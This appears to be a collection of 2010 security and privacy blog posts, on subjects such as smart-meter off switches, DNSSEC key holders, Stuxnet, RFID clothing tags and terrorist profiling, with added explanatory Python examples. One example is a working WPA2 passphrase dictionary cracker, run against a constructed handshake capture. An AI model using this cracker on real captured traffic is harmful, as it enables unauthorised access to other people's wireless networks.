
Security Vulnerabilities of Smart Electricity Meters

Bruce Schneier Schneier on Security

"Who controls the off switch?" by Ross Anderson and Shailendra Fuloria.

Abstract: We're about to acquire a significant new cybervulnerability. The world's energy utilities are starting to install hundreds of millions of 'smart meters' which contain a remote off switch. Its main purpose is to ensure that customers who default on their payments can be switched remotely to a prepay tariff; secondary purposes include supporting interruptible tariffs and implementing rolling power cuts at times of supply shortage.

The off switch creates information security problems of a kind, and on a scale, that the energy companies have not had to face before. From the viewpoint of a cyber attacker -- whether a hostile government agency, a terrorist organisation or even a militant environmental group -- the ideal attack on a target country is to interrupt its citizens' electricity supply. This is the cyber equivalent of a nuclear strike; when electricity stops, then pretty soon everything else does too. Until now, the only plausible ways to do that involved attacks on critical generation, transmission and distribution assets, which are increasingly well defended.

Smart meters change the game. The combination of commands that will cause meters to interrupt the supply, of applets and software upgrades that run in the meters, and of cryptographic keys that are used to authenticate these commands and software changes, create a new strategic vulnerability, which we discuss in this paper.

The two have another paper on the economics of smart meters. Blog post here.

Lawsuit Hits Companies Using 'Zombie' Flash Cookies

kdawson Slashdot: Your Rights Online

A privacy activist has filed a lawsuit targeting eight corporate users of Quantcast's "zombie" Flash cookies, in addition to Quantcast itself. The suit alleges that MTV, ESPN, MySpace, Hulu, ABC, Scribd, and others used Quantcast's Flash-based cookies to recreate browser tracking cookies that users had taken the trouble to delete. "At issue is technology from Quantcast, also targeted in the lawsuit. Quantcast created Flash cookies that track users across the web, and used them to re-create traditional browser cookies that users deleted from their computers. These 'zombie' cookies came to light last year, after researchers at UC Berkeley documented deleted browser cookies returning to life. Quantcast quickly fixed the issue, calling it an unintended consequence of trying to measure web traffic accurately. ... The lawsuit (PDF)... asks the court to find that the practice violated eavesdropping and hacking laws, and that the practice of secretly tracking users also violated state and federal fair trade laws. The lawsuit alleges a 'pattern of covert online surveillance' and seeks status as a class action lawsuit."



Where Did the Money to Rebuild Iraq Go?

Mark Frauenfelder Boing Boing


From the Good Blog: Where Did the Money to Rebuild Iraq Go?

From the Special Inspector General for Iraq Reconstruction, July 27, 2010 (PDF):

Weaknesses in DoD's financial and management controls left it unable to properly account for $8.7 billion of the $9.1 billion in DFI funds it received for reconstruction activities in Iraq. This situation occurred because most DoD organizations receiving DFI funds did not establish the required Department of the Treasury accounts and no DoD organization was designated as the executive agent for managing the use of DFI funds. The breakdown in controls left the funds vulnerable to inappropriate uses and undetected loss.



DNSSEC Root Key Split Among Seven People

Bruce Schneier Schneier on Security

The DNSSEC root key has been divided among seven people:

Part of ICANN's security scheme is the Domain Name System Security, a security protocol that ensures Web sites are registered and "signed" (this is the security measure built into the Web that ensures when you go to a URL you arrive at a real site and not an identical pirate site). Most major servers are a part of DNSSEC, as it's known, and during a major international attack, the system might sever connections between important servers to contain the damage.

A minimum of five of the seven keyholders -- one each from Britain, the U.S., Burkina Faso, Trinidad and Tobago, Canada, China, and the Czech Republic -- would have to converge at a U.S. base with their keys to restart the system and connect everything once again.

That's a secret sharing scheme they're using, most likely Shamir's Secret Sharing.
We know the names of some of them.

Paul Kane -- who lives in the Bradford-on-Avon area -- has been chosen to look after one of seven keys, which will 'restart the world wide web' in the event of a catastrophic event.

Dan Kaminsky is another.

I don't know how they picked those countries.
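The reporting quoted above is loose about what the keys actually do, but the threshold arithmetic itself is simple. Here is an added example, not from the original post and not ICANN's code, of a 5-of-7 Shamir split and recovery over a prime field in Python. The field prime, the share count and the 32-byte test secret are choices made for this example.

```python
import secrets

# Field prime for the arithmetic. Any prime larger than the secret works; the Mersenne
# prime 2^521 - 1 comfortably holds a 256-bit key. (Constructed choice for this example.)
P = 2**521 - 1


def _eval_poly(coeffs, x):
    # Horner's rule over GF(P); coeffs[0] is the secret, the rest are random.
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split_secret(secret, threshold, num_shares):
    """Split `secret` into `num_shares` points on a random polynomial of degree
    threshold-1, so that any `threshold` of them (and no fewer) recover it."""
    if not 0 <= secret < P:
        raise ValueError("secret must be an integer in [0, P)")
    if not 1 < threshold <= num_shares:
        raise ValueError("need 1 < threshold <= num_shares")
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    # Share x-coordinates run 1..n; x = 0 is the secret itself and must never be a share.
    return [(x, _eval_poly(coeffs, x)) for x in range(1, num_shares + 1)]


def recover_secret(shares):
    """Lagrange-interpolate the polynomial at x = 0 from `shares` [(x, y), ...].
    With fewer than `threshold` distinct shares this returns a uniformly wrong
    value, not an error: plain Shamir sharing has no built-in integrity check."""
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share x-coordinates")
    total = 0
    for xi, yi in shares:
        num, den = 1, 1
        for xj in xs:
            if xj != xi:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        # Division in GF(P) is multiplication by the modular inverse (Fermat).
        total = (total + yi * num * pow(den, P - 2, P)) % P
    return total


def key_to_int(key: bytes) -> int:
    return int.from_bytes(key, "big")


def int_to_key(value: int, length: int) -> bytes:
    return value.to_bytes(length, "big")


if __name__ == "__main__":
    # Constructed 32-byte "key" standing in for whatever secret a ceremony protects.
    key = b"constructed 32-byte test secret!"
    shares = split_secret(key_to_int(key), threshold=5, num_shares=7)
    print("from shares 1-5:", int_to_key(recover_secret(shares[:5]), 32))
    print("from shares 3-7:", int_to_key(recover_secret(shares[2:]), 32))
```

Any five of the seven shares recover the secret exactly; four produce an unrelated value with no indication that anything is wrong, which is why deployments wrap shares in an authenticated container, and why the shared value is commonly a key that unlocks a hardware module's backup rather than the bare signing key.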

Terrified guardians of public safety protect kids from rocks, other imaginary dangers

Cory Doctorow Boing Boing

Lenore "Free Range Kids" Skenazy's editorial in Forbes aims at the excessive regulatory zeal in kids' product safety -- where even the faintest whiff of danger is grounds for a recall:
Michael Warring, president of American Educational Products in Fort Collins, Colo., had his shipment all ready: A school's worth of small bags, each one filled with an igneous, sedimentary and metamorphic rock. Then the school canceled its order. Says Warring, "They apparently decided rocks could be harmful to children."... The children will study a poster of rocks instead...

Well, there's the Graco Harmony High Chair. The commission warns parents to "stop using product immediately." Yikes! Scary! Is it ejecting kids? Spontaneously combusting? Not quite. Of the 1,200,000 units sold, the CPSC received "24 reports of injuries, including bumps and bruises to the head, a hairline fracture to the arm, and cuts, bumps, bruises and scratches to the body." In other words: For every 50,000 chairs sold, a single child has suffered a bruise, bump or--once--a hairline fracture. Now look: Nobody likes to see a sweetheart suffer. But the Harmony high chair does not exactly sound like baby's first Pinto.

Students Aren't Allowed To Touch Real Rocks (via JWZ)


Pork-Filled Counter-Islamic Bomb Device

Bruce Schneier Schneier on Security

Okay, this is just weird:

Mark S. Price, a specialist in public security, and his privately held company, Paradise Lost Antiterrorism Network of America (www.plan-a.us), have recently applied to the United States Patent and Trademark Office for a Utility Patent on their Suicide Bomb Deterrent, a security device designed, manufactured and distributed by PLAN-A. This device has been designed to warn and deter potential fanatical religious suicide bomb-wielding terrorists from otherwise detonating an explosive charge within close proximity of said device, to the intended end of successfully accomplishing its namesake purpose of Suicide Bomb Deterrent and the protecting and preserving of all life and property otherwise in mortal and destructive danger.

Reading the partial patent application on their minimal website, it appears to be a packet of pork product, combined with a big sign saying something like: "Warning. If you blow up a bomb right here, you'll get pork stuff all over you before you die -- which might be suboptimal from a religious point of view."

This appears to not be a joke.

WPA Cracking in the Cloud

Bruce Schneier Schneier on Security

It's a service:

The mechanism used involves captured network traffic, which is uploaded to the WPA Cracker service and subjected to an intensive brute force cracking effort. As advertised on the site, what would be a five-day task on a dual-core PC is reduced to a job of about twenty minutes on average. For the more “premium” price of $35, you can get the job done in about half the time. Because it is a dictionary attack using a predefined 135-million-word list, there is no guarantee that you will crack the WPA key, but such an extensive dictionary attack should be sufficient for any but the most specialized penetration testing purposes.

[...]

It gets even better. If you try the standard 135-million-word dictionary and do not crack the WPA encryption on your target network, there is an extended dictionary that contains an additional 284 million words. In short, serious brute force wireless network encryption cracking has become a retail commodity.

FAQ here.
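What the service does for each candidate passphrase is fixed by the WPA2 key schedule, and seeing it spelled out shows where the cost comes from. The Python below is an added example, not the WPA Cracker service's code: it reproduces the PMK, KCK and EAPOL MIC derivation from IEEE 802.11i and runs a dictionary attack against a constructed four-way handshake. The SSID, MAC addresses, nonces and EAPOL frame are made up for this example, not captured traffic.

```python
import hashlib
import hmac
from typing import Optional


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # The SSID salt is why one precomputed table cannot serve every network, and the
    # 4096 iterations are the price paid per candidate passphrase.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated.
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    # For CCMP the PTK is KCK(16) || KEK(16) || TK(16); only the KCK is needed to check the MIC.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    # WPA2 with the PSK AKM uses HMAC-SHA1-128 over the EAPOL-Key frame with its MIC field zeroed.
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: derive PMK -> KCK -> MIC for each candidate and compare
    with the MIC observed in message 2 of the captured four-way handshake."""
    for candidate in wordlist:
        pmk = wpa2_pmk(candidate, capture["ssid"])
        kck = wpa2_kck(pmk, capture["ap_mac"], capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


def make_constructed_capture(passphrase: str) -> dict:
    """Build a synthetic handshake capture (constructed, not real traffic) whose MIC was
    produced with `passphrase`, so the attack above has something to verify against."""
    ssid = "ExampleNet"
    ap_mac, sta_mac = bytes.fromhex("0a1b2c3d4e5f"), bytes.fromhex("a1b2c3d4e5f6")
    anonce, snonce = bytes(range(32)), bytes(range(100, 132))
    # Minimal EAPOL-Key message 2: RSN descriptor, key info 0x010a (MIC | pairwise | HMAC-SHA1).
    eapol = (b"\x02\x03\x00\x5f"                     # EAPOL version 2, type Key, body length 95
             + b"\x02" + b"\x01\x0a" + b"\x00\x00"   # descriptor type, key info, key length
             + (1).to_bytes(8, "big") + snonce      # replay counter, SNonce
             + bytes(16) + bytes(8) + bytes(8)       # key IV, RSC, key ID
             + bytes(16) + b"\x00\x00")              # MIC field (zeroed), key data length
    kck = wpa2_kck(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


if __name__ == "__main__":
    cap = make_constructed_capture("correct horse")
    print(crack_psk(cap, ["password", "12345678", "correct horse", "letmein1"]))
```

Each guess costs one 4096-iteration PBKDF2, and because the SSID is the salt the work cannot be shared across networks with different names, which is exactly what a parallel cloud service sells by the job. The attack is entirely offline once a handshake has been captured, so for a PSK network the only defence is a passphrase that appears in no list, or moving to 802.1X where there is no shared passphrase to guess.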

In related news, there might be a man-in-the-middle attack possible against the WPA2 protocol. Man-in-the-middle attacks are potentially serious, but it depends on the details -- and they're not available yet.

1921 Book on Profiling

Bruce Schneier Schneier on Security

Here's a book from 1921 on how to profile people.

Technology is Making Life Harder for Spies

Bruce Schneier Schneier on Security

An article from The Economist makes a point that I have been thinking about for a while: modern technology makes life harder for spies, not easier. It used to be that technology favored spycraft -- think James Bond gadgets -- but more and more, technology favors spycatchers. The ubiquitous collection of personal data makes it harder to maintain a false identity, ubiquitous eavesdropping makes it harder to communicate securely, the prevalence of cameras makes it harder to not be seen, and so on.

I think this is an example of the general tendency of modern information and communications technology to increase power in proportion to existing power. So while technology makes the lone spy more effective, it makes an institutional counterspy organization much more powerful.

Walmart To Put RFID Tags In Your Undies

Chris Morran The Consumerist

In an effort to better track inventory of its clothing items, Walmart is planning to start placing removable RFID tags on individual pairs of jeans and underwear. But some privacy advocates worry that the tags may allow unscrupulous types to learn more about your purchasing habits than you'd generally care to share.

The goal for Walmart is better inventory control. Having RFID tags placed on items, especially those available in different sizes, would allow employees to quickly scan each shelf with a hand-held device. They would then immediately know if the proper mix and quantity of each item is on the shelf.

Walmart says all RFID chips will be placed on easily removable tags that hang off the clothing like price tags.

But privacy advocates worry that even after the tags are removed, it would be incredibly easy for someone with the handheld scanner to roll down your street and scan your garbage to get an idea of what you're buying.

They also don't like the idea of retailers -- not necessarily just Walmart -- using RFID scanners to read personal info stored on the new generation of credit cards and driver's licenses that contain RFID chips.

Says an RFID-hater:

There are two things you really don't want to tag, clothing and identity documents, and ironically that's where we are seeing adoption... The inventory guys may be in the dark about this, but there are a lot of corporate marketers who are interested in tracking people as they walk sales floors.

Counters a brainiac from MIT:

Concerns about privacy are valid, but in this instance, the benefits far outweigh any concerns... The tags don't have any personal information. They are essentially barcodes with serial numbers attached. And you can easily remove them.

Perhaps Walmart should do what's being done in Europe -- or what retailers have done for years with those anti-theft devices -- and remove the RFID tags at the point of checkout.

Speaking of anti-theft devices, Wal-Mart says the RFID chips should cut down on employee theft because it will be easier to see if something's gone missing from the back room.
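Both sides of the quoted argument are right about what is on the tag, and it helps to look at the bits. The Python below is an added example, not from the article and not Walmart's system; it assumes the tags carry an EPC SGTIN-96 code, the common encoding for retail item-level tags (the article does not say which encoding Walmart uses). The company prefix, item reference, serial numbers and read locations are constructed for the example.

```python
# SGTIN-96 partition table (GS1 EPC Tag Data Standard):
# partition -> (company prefix bits, company prefix digits, item reference bits, item reference digits)
PARTITIONS = {
    0: (40, 12, 4, 1), 1: (37, 11, 7, 2), 2: (34, 10, 10, 3), 3: (30, 9, 14, 4),
    4: (27, 8, 17, 5), 5: (24, 7, 20, 6), 6: (20, 6, 24, 7),
}
SGTIN96_HEADER = 0x30


def encode_sgtin96(filter_value: int, company_prefix: str, item_ref: str, serial: int) -> str:
    """Pack the fields into the 96-bit layout: header(8) filter(3) partition(3)
    company prefix + item reference (44 bits together) serial(38). Returns 24 hex digits."""
    part = next((p for p, (_, cd, _, _) in PARTITIONS.items() if cd == len(company_prefix)), None)
    if part is None:
        raise ValueError("company prefix must be 6..12 digits")
    cbits, _, ibits, idigits = PARTITIONS[part]
    if len(item_ref) != idigits:
        raise ValueError(f"item reference must be {idigits} digits for this prefix length")
    if not 0 <= filter_value < 8 or not 0 <= serial < 2**38:
        raise ValueError("filter is 3 bits, serial is 38 bits")
    bits = ((SGTIN96_HEADER << 88) | (filter_value << 85) | (part << 82)
            | (int(company_prefix) << (82 - cbits)) | (int(item_ref) << 38) | serial)
    return f"{bits:024X}"


def decode_sgtin96(epc_hex: str):
    """Inverse of encode_sgtin96: the tag holds a product code plus a per-item serial,
    and nothing about the buyer."""
    v = int(epc_hex, 16)
    if v >> 88 != SGTIN96_HEADER:
        raise ValueError("not an SGTIN-96 EPC")
    filter_value = (v >> 85) & 0x7
    part = (v >> 82) & 0x7
    cbits, cdigits, ibits, idigits = PARTITIONS[part]
    company = (v >> (82 - cbits)) & ((1 << cbits) - 1)
    item = (v >> 38) & ((1 << ibits) - 1)
    serial = v & ((1 << 38) - 1)
    return filter_value, f"{company:0{cdigits}d}", f"{item:0{idigits}d}", serial


def link_reads(reads):
    """Group tag reads by (company, item, serial). Two reads with the same serial are the
    same physical garment, so a serial seen on the sales floor and later at the curb ties
    those two sightings together even though neither read names a person."""
    seen = {}
    for where, epc_hex in reads:
        _, company, item, serial = decode_sgtin96(epc_hex)
        seen.setdefault((company, item, serial), []).append(where)
    return {k: v for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    # Constructed reads: two pairs of the same jeans on the shelf, one of them later in a bin.
    jeans_a = encode_sgtin96(1, "0614141", "812345", 6789)
    jeans_b = encode_sgtin96(1, "0614141", "812345", 6790)
    reads = [("store shelf, aisle 4", jeans_a), ("store shelf, aisle 4", jeans_b),
             ("curbside bin, 12 Elm St", jeans_a)]
    print(decode_sgtin96(jeans_a))
    print(link_reads(reads))
```

The MIT comment holds: the code is a product number plus a serial. The privacy objection also holds, because the serial is unique per item and readable by anyone with a reader, so the linkage happens in whoever's database joins a read to a sale or an address. Killing or removing the tag at checkout, as the article suggests, is what breaks that join.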

Wal-Mart Radio Tags to Track Clothing [WSJ via Newser.com]

Australian government blocks out 90% of document on web-spying plans

Cory Doctorow Boing Boing

Australia's web-censors have outdone themselves. After Stephen Conroy (the Australian minister notorious for proposing the Great Firewall of Australia) promised greater transparency in his government's efforts to regulate the Internet, they replied to a Freedom of Information request on plans to monitor Australians' internet traffic with a document that was 90 percent blacked out:
The federal government has censored approximately 90 per cent of a secret document outlining its controversial plans to snoop on Australians' web surfing, obtained under freedom of information (FoI) laws, out of fear the document could cause "premature unnecessary debate".

The government has been consulting with the internet industry over the proposal, which would require ISPs to store certain internet activities of all Australians - regardless of whether they have been suspected of wrongdoing - for law-enforcement agencies to access.

All parties to the consultations have been sworn to secrecy.

(Thanks, Itsumishi!)


The TSA's New Secure Flight Program Adds Another Step to Your Travel Checklist [Travel]

Adam Dachis Lifehacker

The Transport Security Administration (TSA) has launched a new program called Secure Flight that aims to better protect you, but as usual it comes with yet another annoying detail to remember when planning your travel.

When booking a flight traveling to, from, or within the United States, the TSA will be checking your booking information against your ID or passport. This means the full name, date of birth, and gender you use to book your flight need to be identical to those on your identification. With many travel sites retaining your personal data for later bookings, you should start updating your accounts to make things easier when making your travel plans. If your information doesn't match, you could be delayed or denied when you arrive at your airport's security checkpoint.

The advantage of this new program is that you'll know if you're on the no-fly list immediately after trying to book a ticket. The TSA's put together a FAQ and video to help clear up any confusion over these new policies. In most cases this won't cause too much trouble, but if you're making travel plans be sure to double-check that everything matches.

Note: It may also be worthwhile to call the specific airline you're booking with to check if any additional information is required. I've received a notification from one airline implying my address needs to match my ID, which may indicate future restrictions of the Secure Flight program (or may just be something JetBlue is doing).

TSA Secure Flight

Friday Squid Blogging: Squidbillies

Bruce Schneier Schneier on Security

Where do these TV shows come from?

Follows the adventures of the Cuylers, an impoverished and dysfunctional family of anthropomorphic, air-breathing, redneck squids who live in a rural Appalachian community in the US state of Georgia.

The Washington Post on the U.S. Intelligence Industry

Bruce Schneier Schneier on Security

The Washington Post has published a phenomenal piece of investigative journalism: a long, detailed, and very interesting expose on the U.S. intelligence industry (overall website; parts 1, 2, and 3; blog; Washington reactions; top 10 revelations; many many many blog comments and reactions; and so on).

It's a truly excellent piece of investigative journalism. Pity people don't care much about investigative journalism -- or facts in politics, really -- anymore.

EDITED TO ADD (7/25): More commentary.

EDITED TO ADD (7/26): Jay Rosen writes:

Last week, it was the Washington Post's big series, Top Secret America, two years in the making. It reported on the massive security shadowland that has arisen since 09/11. The Post basically showed that there is no accountability, no knowledge at the center of what the system as a whole is doing, and too much "product" to make intelligent use of. We're wasting billions upon billions of dollars on an intelligence system that does not work. It's an explosive finding but the explosive reactions haven't followed, not because the series didn't do its job, but rather: the job of fixing what is broken would break the system responsible for such fixes.

The mental model on which most investigative journalism is based states that explosive revelations lead to public outcry; elites get the message and reform the system. But what if elites believe that reform is impossible because the problems are too big, the sacrifices too great, the public too distractible? What if cognitive dissonance has been insufficiently accounted for in our theories of how great journalism works...and often fails to work?

EDITED TO ADD (7/27): More.

Internet Worm Targets SCADA

Bruce Schneier Schneier on Security

Stuxnet is a new Internet worm that specifically targets Siemens WinCC SCADA systems, which are used to control production at industrial plants such as oil rigs, refineries, electronics production lines, and so on. The worm seems to upload plant information (schematics and production data) to an external website. Moreover, owners of these SCADA systems cannot change the default password, because doing so would break the software.

More Research on the Effectiveness of Terrorist Profiling

Bruce Schneier Schneier on Security

Interesting:

The use of profiling by ethnicity or nationality to trigger secondary security screening is a controversial social and political issue. Overlooked is the question of whether such actuarial methods are in fact mathematically justified, even under the most idealized assumptions of completely accurate prior probabilities, and secondary screenings concentrated on the highest-probability individuals. We show here that strong profiling (defined as screening at least in proportion to prior probability) is no more efficient than uniform random sampling of the entire population, because resources are wasted on the repeated screening of higher probability, but innocent, individuals. A mathematically optimal strategy would be "square-root biased sampling," the geometric mean between strong profiling and uniform sampling, with secondary screenings distributed broadly, although not uniformly, over the population. Square-root biased sampling is a general idea that can be applied whenever a "bell-ringer" event must be found by sampling with replacement, but can be recognized (either with certainty, or with some probability) when seen.
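The result in that abstract follows from a short calculation, carried through here as an added example in Python (not code from the paper). If the bad actor is person i with prior probability p_i and each screening draws person i with probability q_i, with replacement, the wait for person i is geometric with mean 1/q_i, so the expected number of screenings is the sum of p_i/q_i. The population below is constructed for illustration.

```python
import math
import random
from itertools import accumulate


def expected_screenings(prior, policy):
    """Expected number of secondary screenings until the single bad actor is screened:
    sum_i prior[i] / policy[i]. A person who might be the bad actor but is never
    screened (policy 0) makes the expectation infinite."""
    total = 0.0
    for p, q in zip(prior, policy):
        if p > 0 and q == 0:
            return math.inf
        if p > 0:
            total += p / q
    return total


def uniform_policy(prior):
    n = len(prior)
    return [1.0 / n] * n


def strong_profiling_policy(prior):
    # Screen exactly in proportion to the prior: every term p_i/q_i is 1, so E = N, same as uniform.
    return list(prior)


def sqrt_biased_policy(prior):
    # Minimising sum p_i/q_i subject to sum q_i = 1 (Lagrange multipliers) gives q_i proportional
    # to sqrt(p_i); the expectation becomes (sum sqrt(p_i))^2 <= N.
    w = [math.sqrt(p) for p in prior]
    s = sum(w)
    return [x / s for x in w]


def compare_policies(prior):
    return {
        "uniform": expected_screenings(prior, uniform_policy(prior)),
        "strong_profiling": expected_screenings(prior, strong_profiling_policy(prior)),
        "sqrt_biased": expected_screenings(prior, sqrt_biased_policy(prior)),
    }


def simulate(prior, policy, trials=1000, seed=1):
    """Monte Carlo check of the closed form: draw the bad actor from `prior`, then screen
    with replacement according to `policy` until that person is picked."""
    rng = random.Random(seed)
    people = range(len(prior))
    cum_prior = list(accumulate(prior))
    cum_policy = list(accumulate(policy))
    total = 0
    for _ in range(trials):
        target = rng.choices(people, cum_weights=cum_prior)[0]
        draws = 1
        while rng.choices(people, cum_weights=cum_policy)[0] != target:
            draws += 1
        total += draws
    return total / trials


def constructed_prior(n=1000, n_high=10, high_mass=0.5):
    # Constructed population: n_high people share half the prior mass, everyone else the other half.
    low = (1.0 - high_mass) / (n - n_high)
    return [high_mass / n_high] * n_high + [low] * (n - n_high)


if __name__ == "__main__":
    prior = constructed_prior()
    for name, value in compare_policies(prior).items():
        print(f"{name:>17}: {value:7.1f} expected screenings")
    small = constructed_prior(n=100, n_high=5)
    print("simulated uniform, n=100:", simulate(small, uniform_policy(small)))
```

With a thousand people, ten of whom carry half the prior mass, uniform sampling and strong profiling both need about 1000 screenings on average, while square-root biasing needs about 600; the profiling budget is spent re-screening the same high-prior innocents.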

Obama Won't Intervene Over British Hacker McKinnon

timothy Slashdot: Your Rights Online

CWmike writes "President Barack Obama said on Tuesday that he can't intervene in the long-running case of a British hacker charged with breaking into US military computers. Gary McKinnon's case came up during discussions with British Prime Minister David Cameron in Washington. The UK Home Office is reviewing whether McKinnon's medical condition is grounds to block his extradition to the US, which was approved in 2006. McKinnon has yet to stand trial in the US, where he was indicted by the US District Court for the Eastern District of Virginia in 2002 for hacking into 97 military and NASA computers between February 2001 and March 2002. Obama said during a press conference with Cameron that by tradition US presidents do not get involved in extraditions or prosecutions. 'I trust that this will get resolved in a way that underscores the seriousness of the issue, but also underscores the fact that we work together and we can find an appropriate solution,' Obama said."



Undercover IKEA Receipt Checker Detained Me, Manager Threatened Jail

Phil Villarreal The Consumerist

Andrew ran into an IKEA receipt checker who seemed to have used Paul Blart: Mall Cop as a training video. The un-uniformed shopping cop demanded to see his receipt, threatened his arrest if he didn't comply and made him sweat out the shakedown as he took an unreasonable amount of time.

He writes:

I was shopping at the [redacted] IKEA today and after going through the self check out a man not in any uniform (Ikea or otherwise) asked to see my receipt. What he said was " I need to see your receipt."

I complied and after about a minute I said, "you have another 10 seconds and then I am leaving." He replied with "you will let me finish." I demanded my receipt and he told me that "if you do not let me check you could be arrested". Needless to say I became irate and demanded both my receipt and a manager. He refused to give me the receipt and then pointed to a phone on the cashier podium and said "you can call the manager yourself."

We got into a yelling argument all the while he refused to give me the receipt. Finally an employee called a manager.

When the manager came, he had no name tag, refused his own name and told me "you have to let us check, if not you will go to jail."

I demanded his name and the name of the "security" person, both refused.

Finally, after several minutes, I was given my receipt. This cannot be normal for Ikea to operate this way and detain people.

A reminder: Unless a store requires you to sign to a receipt-checking agreement under a membership or you're under a reasonable suspicion of shoplifting, you don't have to submit to store security forces on receipt-scanning power trips.

Why Photography Bullying is Illegal, and You Don't Have to Take It [Police]

Sam Biddle Lifehacker

We've previously covered how, despite camera ubiquity, amateur and journalistic reports of police, security guards, and other authority figures of varying legitimacy intimidating harmless photographers continue to pop up. Popular Mechanics explains why this harassment isn't just wrong, but illegal.

Instances of such intimidation—misguided at best, but often outright thuggish—occur anywhere from shopping malls to public streets, and often go down when citizens attempt to document an arrest or other police action. And while Popular Mechanics' Glenn Harlan Reynolds notes that mall cops may have a legal basis for asking you to put your camera away, public property (such as any sidewalk, street, or municipal area) is always fair game.


Reynolds cites Bert Krages, an attorney specializing in photography law (very cool!), who explains "The general rule is that if something is in a public place, you're entitled to photograph it." And there's nothing in the Patriot or Homeland Security acts that says otherwise, contrary to what a misinformed officer might try to tell you. You snapping a pic of a police traffic stop is no more a privacy violation than a wide-eyed tourist photographing a Times Square Sbarro.

But what about terrorism? Still not an excuse. As Bruce Schneier, head of security technology for British Telecom points out, the notion that terrorist conspirators photograph their targets is an overblown one: "Look at the 9/11 attacks, the Moscow and London subway bombings, the Fort Hood shooting—no photos." Rather, Reynolds argues, a camera in the hand of every pedestrian can only serve to foil potential plotters.


If you or someone you know is menaced by police who claim you're breaking the law by merely hitting the shutter, Reynolds advises to—politely—ask what legal authority they have to stop you, and to speak with a supervisor. But the only permanent fix will be an emphasis on educating guards and police, or the type of legislation recently introduced by Congressman Edolphus Towns.

Taking photos through your ex-girlfriend's window is still very, very illegal, however. [Popular Mechanics]
Images via stevendepolo, BAR Photography, and jason.kuffer

Raw food raids are on the rise

Xeni Jardin Boing Boing

"If you take my computer again, I can't do my homework."—Words spoken to agents raiding a small California dairy farm by the owner's 12-year-old daughter. The farm is known for producing raw goats' milk cheese that is sold by members-only raw food markets. Grist reports that local, state, and federal raids on alternative "raw foodie" membership marketplaces are on the rise. (via Good)